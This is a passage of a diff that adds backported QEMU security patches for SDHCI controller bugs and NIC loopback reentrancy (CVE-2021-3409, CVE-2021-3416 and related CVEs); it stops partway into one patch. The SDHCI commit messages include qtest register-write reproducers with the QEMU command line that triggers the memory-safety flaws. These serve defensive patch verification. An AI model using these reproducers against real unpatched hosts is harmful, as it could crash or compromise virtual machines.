+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -316,6 +316,7 @@ static void sdhci_send_command(SDHCIStat
+     SDRequest request;
+     uint8_t response[16];
+     int rlen;
++    bool timeout = false;
+ 
+     s->errintsts = 0;
+     s->acmd12errsts = 0;
+@@ -339,6 +340,7 @@ static void sdhci_send_command(SDHCIStat
+             trace_sdhci_response16(s->rspreg[3], s->rspreg[2],
+                                    s->rspreg[1], s->rspreg[0]);
+         } else {
++            timeout = true;
+             trace_sdhci_error("timeout waiting for command response");
+             if (s->errintstsen & SDHC_EISEN_CMDTIMEOUT) {
+                 s->errintsts |= SDHC_EIS_CMDTIMEOUT;
+@@ -359,7 +361,7 @@ static void sdhci_send_command(SDHCIStat
+ 
+     sdhci_update_irq(s);
+ 
+-    if (s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
++    if (!timeout && s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
+         s->data_count = 0;
+         sdhci_data_transfer(s);
+     }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
new file mode 100644
index 0000000000..dc00f76ec9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
@@ -0,0 +1,103 @@
+From 8be45cc947832b3c02144c9d52921f499f2d77fe Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:36 +0800
+Subject: [PATCH] hw/sd: sdhci: Don't write to SDHC_SYSAD register when
+ transfer is in progress
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+Per "SD Host Controller Standard Specification Version 7.00"
+chapter 2.2.1 SDMA System Address Register:
+
+This register can be accessed only if no transaction is executing
+(i.e., after a transaction has stopped).
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001010
+outl 0xcfc 0xfbefff00
+outl 0xcf8 0x80001001
+outl 0xcfc 0x06000000
+write 0xfbefff2c 0x1 0x05
+write 0xfbefff0f 0x1 0x37
+write 0xfbefff0a 0x1 0x01
+write 0xfbefff0f 0x1 0x29
+write 0xfbefff0f 0x1 0x02
+write 0xfbefff0f 0x1 0x03
+write 0xfbefff04 0x1 0x01
+write 0xfbefff05 0x1 0x01
+write 0xfbefff07 0x1 0x02
+write 0xfbefff0c 0x1 0x33
+write 0xfbefff0e 0x1 0x20
+write 0xfbefff0f 0x1 0x00
+write 0xfbefff2a 0x1 0x01
+write 0xfbefff0c 0x1 0x00
+write 0xfbefff03 0x1 0x00
+write 0xfbefff05 0x1 0x00
+write 0xfbefff2a 0x1 0x02
+write 0xfbefff0c 0x1 0x32
+write 0xfbefff01 0x1 0x01
+write 0xfbefff02 0x1 0x01
+write 0xfbefff03 0x1 0x01
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+       -nodefaults -device sdhci-pci,sd-spec-version=3 \
+       -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+       -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-3-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-2.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8be45cc947832b3c02144c9d52921f499f2d77fe ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1117,15 +1117,17 @@ sdhci_write(void *opaque, hwaddr offset,
+ 
+     switch (offset & ~0x3) {
+     case SDHC_SYSAD:
+-        s->sdmasysad = (s->sdmasysad & mask) | value;
+-        MASKED_WRITE(s->sdmasysad, mask, value);
+-        /* Writing to last byte of sdmasysad might trigger transfer */
+-        if (!(mask & 0xFF000000) && TRANSFERRING_DATA(s->prnsts) && s->blkcnt &&
+-                s->blksize && SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
+-            if (s->trnmod & SDHC_TRNS_MULTI) {
+-                sdhci_sdma_transfer_multi_blocks(s);
+-            } else {
+-                sdhci_sdma_transfer_single_block(s);
++        if (!TRANSFERRING_DATA(s->prnsts)) {
++            s->sdmasysad = (s->sdmasysad & mask) | value;
++            MASKED_WRITE(s->sdmasysad, mask, value);
++            /* Writing to last byte of sdmasysad might trigger transfer */
++            if (!(mask & 0xFF000000) && s->blkcnt && s->blksize &&
++                SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
++                if (s->trnmod & SDHC_TRNS_MULTI) {
++                    sdhci_sdma_transfer_multi_blocks(s);
++                } else {
++                    sdhci_sdma_transfer_single_block(s);
++                }
+             }
+         }
+         break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
new file mode 100644
index 0000000000..d06ac0ed3c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
@@ -0,0 +1,71 @@
+Backport of:
+
+From bc6f28995ff88f5d82c38afcfd65406f0ae375aa Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:37 +0800
+Subject: [PATCH] hw/sd: sdhci: Correctly set the controller status for ADMA
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+When an ADMA transfer is started, the codes forget to set the
+controller status to indicate a transfer is in progress.
+
+With this fix, the following 2 reproducers:
+
+https://paste.debian.net/plain/1185136
+https://paste.debian.net/plain/1185141
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+      -nodefaults -device sdhci-pci,sd-spec-version=3 \
+      -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+      -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-4-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/bc6f28995ff88f5d82c38afcfd65406f0ae375aa ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -776,8 +776,9 @@ static void sdhci_do_adma(SDHCIState *s)
+ 
+         switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
+         case SDHC_ADMA_ATTR_ACT_TRAN:  /* data transfer */
+-
++            s->prnsts |= SDHC_DATA_INHIBIT | SDHC_DAT_LINE_ACTIVE;
+             if (s->trnmod & SDHC_TRNS_READ) {
++                s->prnsts |= SDHC_DOING_READ;
+                 while (length) {
+                     if (s->data_count == 0) {
+                         for (n = 0; n < block_size; n++) {
+@@ -807,6 +808,7 @@ static void sdhci_do_adma(SDHCIState *s)
+                     }
+                 }
+             } else {
++                s->prnsts |= SDHC_DOING_WRITE;
+                 while (length) {
+                     begin = s->data_count;
+                     if ((length + begin) < block_size) {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
new file mode 100644
index 0000000000..2e49e3bc18
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
@@ -0,0 +1,52 @@
+Backport of:
+
+From 5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:38 +0800
+Subject: [PATCH] hw/sd: sdhci: Limit block size only when SDHC_BLKSIZE
+ register is writable
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+The codes to limit the maximum block size is only necessary when
+SDHC_BLKSIZE register is writable.
+
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-5-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 14 +++++++-------
+ 1 file changed, 7 insertions(+), 7 deletions(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1137,15 +1137,15 @@ sdhci_write(void *opaque, hwaddr offset,
+         if (!TRANSFERRING_DATA(s->prnsts)) {
+             MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+             MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+-        }
+ 
+-        /* Limit block size to the maximum buffer size */
+-        if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
+-            qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than " \
+-                          "the maximum buffer 0x%x", __func__, s->blksize,
+-                          s->buf_maxsz);
++            /* Limit block size to the maximum buffer size */
++            if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
++                qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than "
++                              "the maximum buffer 0x%x\n", __func__, s->blksize,
++                              s->buf_maxsz);
+ 
+-            s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
++                s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
++            }
+         }
+ 
+         break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
new file mode 100644
index 0000000000..7b436809e9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
@@ -0,0 +1,93 @@
+From cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:39 +0800
+Subject: [PATCH] hw/sd: sdhci: Reset the data pointer of s->fifo_buffer[] when
+ a different block size is programmed
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+If the block size is programmed to a different value from the
+previous one, reset the data pointer of s->fifo_buffer[] so that
+s->fifo_buffer[] can be filled in using the new block size in
+the next transfer.
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001010
+outl 0xcfc 0xe0000000
+outl 0xcf8 0x80001001
+outl 0xcfc 0x06000000
+write 0xe000002c 0x1 0x05
+write 0xe0000005 0x1 0x02
+write 0xe0000007 0x1 0x01
+write 0xe0000028 0x1 0x10
+write 0x0 0x1 0x23
+write 0x2 0x1 0x08
+write 0xe000000c 0x1 0x01
+write 0xe000000e 0x1 0x20
+write 0xe000000f 0x1 0x00
+write 0xe000000c 0x1 0x32
+write 0xe0000004 0x2 0x0200
+write 0xe0000028 0x1 0x00
+write 0xe0000003 0x1 0x40
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+      -nodefaults -device sdhci-pci,sd-spec-version=3 \
+      -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+      -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-6-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1135,6 +1135,8 @@ sdhci_write(void *opaque, hwaddr offset,
+         break;
+     case SDHC_BLKSIZE:
+         if (!TRANSFERRING_DATA(s->prnsts)) {
++            uint16_t blksize = s->blksize;
++
+             MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+             MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+ 
+@@ -1146,6 +1148,16 @@ sdhci_write(void *opaque, hwaddr offset,
+ 
+                 s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
+             }
++
++            /*
++             * If the block size is programmed to a different value from
++             * the previous one, reset the data pointer of s->fifo_buffer[]
++             * so that s->fifo_buffer[] can be filled in using the new block
++             * size in the next transfer.
++             */
++            if (blksize != s->blksize) {
++                s->data_count = 0;
++            }
+         }
+ 
+         break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
new file mode 100644
index 0000000000..5bacd67481
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
@@ -0,0 +1,177 @@
+From 4b1988a29d67277d6c8ce1df52975f5616592913 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 11:44:36 +0800
+Subject: [PATCH 01/10] net: introduce qemu_receive_packet()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Some NIC supports loopback mode and this is done by calling
+nc->info->receive() directly which in fact suppresses the effort of
+reentrancy check that is done in qemu_net_queue_send().
+
+Unfortunately we can't use qemu_net_queue_send() here since for
+loopback there's no sender as peer, so this patch introduce a
+qemu_receive_packet() which is used for implementing loopback mode
+for a NIC with this check.
+
+NIC that supports loopback mode will be converted to this helper.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [705df5466c98f3efdd2b68d3b31dad86858acad7]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ include/net/net.h   |  5 +++++
+ include/net/queue.h |  8 ++++++++
+ net/net.c           | 38 +++++++++++++++++++++++++++++++-------
+ net/queue.c         | 22 ++++++++++++++++++++++
+ 4 files changed, 66 insertions(+), 7 deletions(-)
+
+diff --git a/include/net/net.h b/include/net/net.h
+index 778fc787c..03f058ecb 100644
+--- a/include/net/net.h
++++ b/include/net/net.h
+@@ -143,12 +143,17 @@ void *qemu_get_nic_opaque(NetClientState *nc);
+ void qemu_del_net_client(NetClientState *nc);
+ typedef void (*qemu_nic_foreach)(NICState *nic, void *opaque);
+ void qemu_foreach_nic(qemu_nic_foreach func, void *opaque);
++int qemu_can_receive_packet(NetClientState *nc);
+ int qemu_can_send_packet(NetClientState *nc);
+ ssize_t qemu_sendv_packet(NetClientState *nc, const struct iovec *iov,
+                           int iovcnt);
+ ssize_t qemu_sendv_packet_async(NetClientState *nc, const struct iovec *iov,
+                                 int iovcnt, NetPacketSent *sent_cb);
+ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size);
++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size);
++ssize_t qemu_receive_packet_iov(NetClientState *nc,
++                                const struct iovec *iov,
++                                int iovcnt);
+ ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size);
+ ssize_t qemu_send_packet_async(NetClientState *nc, const uint8_t *buf,
+                                int size, NetPacketSent *sent_cb);
+diff --git a/include/net/queue.h b/include/net/queue.h
+index c0269bb1d..9f2f289d7 100644
+--- a/include/net/queue.h
++++ b/include/net/queue.h
+@@ -55,6 +55,14 @@ void qemu_net_queue_append_iov(NetQueue *queue,
+ 
+ void qemu_del_net_queue(NetQueue *queue);
+ 
++ssize_t qemu_net_queue_receive(NetQueue *queue,
++                               const uint8_t *data,
++                               size_t size);
++
++ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
++                                   const struct iovec *iov,
++                                   int iovcnt);
++
+ ssize_t qemu_net_queue_send(NetQueue *queue,
+                             NetClientState *sender,
+                             unsigned flags,
+diff --git a/net/net.c b/net/net.c
+index 6a2c3d956..5e15e5d27 100644
+--- a/net/net.c
++++ b/net/net.c
+@@ -528,6 +528,17 @@ int qemu_set_vnet_be(NetClientState *nc, bool is_be)
+ #endif
+ }
+ 
++int qemu_can_receive_packet(NetClientState *nc)
++{
++    if (nc->receive_disabled) {
++        return 0;
++    } else if (nc->info->can_receive &&
++               !nc->info->can_receive(nc)) {
++        return 0;
++    }
++    return 1;
++}
++
+ int qemu_can_send_packet(NetClientState *sender)
+ {
+     int vm_running = runstate_is_running();
+@@ -540,13 +551,7 @@ int qemu_can_send_packet(NetClientState *sender)
+         return 1;
+     }
+ 
+-    if (sender->peer->receive_disabled) {
+-        return 0;
+-    } else if (sender->peer->info->can_receive &&
+-               !sender->peer->info->can_receive(sender->peer)) {
+-        return 0;
+-    }
+-    return 1;
++    return qemu_can_receive_packet(sender->peer);
+ }
+ 
+ static ssize_t filter_receive_iov(NetClientState *nc,
+@@ -679,6 +684,25 @@ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size)
+     return qemu_send_packet_async(nc, buf, size, NULL);
+ }
+ 
++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size)
++{
++    if (!qemu_can_receive_packet(nc)) {
++        return 0;
++    }
++
++    return qemu_net_queue_receive(nc->incoming_queue, buf, size);
++}
++
++ssize_t qemu_receive_packet_iov(NetClientState *nc, const struct iovec *iov,
++                                int iovcnt)
++{
++    if (!qemu_can_receive_packet(nc)) {
++        return 0;
++    }
++
++    return qemu_net_queue_receive_iov(nc->incoming_queue, iov, iovcnt);
++}
++
+ ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size)
+ {
+     return qemu_send_packet_async_with_flags(nc, QEMU_NET_PACKET_FLAG_RAW,
+diff --git a/net/queue.c b/net/queue.c
+index 19e32c80f..c872d51df 100644
+--- a/net/queue.c
++++ b/net/queue.c
+@@ -182,6 +182,28 @@ static ssize_t qemu_net_queue_deliver_iov(NetQueue *queue,
+     return ret;
+ }
+ 
++ssize_t qemu_net_queue_receive(NetQueue *queue,
++                               const uint8_t *data,
++                               size_t size)
++{
++    if (queue->delivering) {
++        return 0;
++    }
++
++    return qemu_net_queue_deliver(queue, NULL, 0, data, size);
++}
++
++ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
++                                   const struct iovec *iov,
++                                   int iovcnt)
++{
++    if (queue->delivering) {
++        return 0;
++    }
++
++    return qemu_net_queue_deliver_iov(queue, NULL, 0, iov, iovcnt);
++}
++
+ ssize_t qemu_net_queue_send(NetQueue *queue,
+                             NetClientState *sender,
+                             unsigned flags,
+-- 
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
new file mode 100644
index 0000000000..fdb4894e44
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
@@ -0,0 +1,41 @@
+From 65b851efd3d0280425c202f4e5880c48f8334dae Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 14:35:30 -0500
+Subject: [PATCH 10/10] lan9118: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [37cee01784ff0df13e5209517e1b3594a5e792d1]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/lan9118.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/lan9118.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/lan9118.c
++++ qemu-4.2.0/hw/net/lan9118.c
+@@ -667,7 +667,7 @@ static void do_tx_packet(lan9118_state *
+     /* FIXME: Honor TX disable, and allow queueing of packets.  */
+     if (s->phy_control & 0x4000)  {
+         /* This assumes the receive routine doesn't touch the VLANClient.  */
+-        lan9118_receive(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
++        qemu_receive_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
+     } else {
+         qemu_send_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len);
+     }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
new file mode 100644
index 0000000000..5e53e20bac
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch
@@ -0,0 +1,42 @@
+From e2a48a3c7cc33dbbe89f896e0f07462cb04ff6b5 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 12:13:22 +0800
+Subject: [PATCH 02/10] e1000: switch to use qemu_receive_packet() for loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [1caff0340f49c93d535c6558a5138d20d475315c]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/e1000.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/e1000.c b/hw/net/e1000.c
+index d7d05ae30..cf22c4f07 100644
+--- a/hw/net/e1000.c
++++ b/hw/net/e1000.c
+@@ -546,7 +546,7 @@ e1000_send_packet(E1000State *s, const uint8_t *buf, int size)
+ 
+     NetClientState *nc = qemu_get_queue(s->nic);
+     if (s->phy_reg[PHY_CTRL] & MII_CR_LOOPBACK) {
+-        nc->info->receive(nc, buf, size);
++        qemu_receive_packet(nc, buf, size);
+     } else {
+         qemu_send_packet(nc, buf, size);
+     }
+-- 
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
new file mode 100644
index 0000000000..3fc469e3e3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch
@@ -0,0 +1,43 @@
+From c041a4da1ff119715e0ccf2d4a7af62568f17b93 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 12:57:40 +0800
+Subject: [PATCH 03/10] dp8393x: switch to use qemu_receive_packet() for
+ loopback packet
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [331d2ac9ea307c990dc86e6493e8f0c48d14bb33]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/dp8393x.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/dp8393x.c b/hw/net/dp8393x.c
+index 205c0decc..533a8304d 100644
+--- a/hw/net/dp8393x.c
++++ b/hw/net/dp8393x.c
+@@ -506,7 +506,7 @@ static void dp8393x_do_transmit_packets(dp8393xState *s)
+             s->regs[SONIC_TCR] |= SONIC_TCR_CRSL;
+             if (nc->info->can_receive(nc)) {
+                 s->loopback_packet = 1;
+-                nc->info->receive(nc, s->tx_buffer, tx_len);
++                qemu_receive_packet(nc, s->tx_buffer, tx_len);
+             }
+         } else {
+             /* Transmit packet */
+-- 
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
new file mode 100644
index 0000000000..93202ebcef
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch
@@ -0,0 +1,42 @@
+From d465dc79c9ee729d91ef086b993e956b1935be69 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:14:35 +0800
+Subject: [PATCH 05/10] sungem: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [8c92060d3c0248bd4d515719a35922cd2391b9b4]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/sungem.c | 2 +-
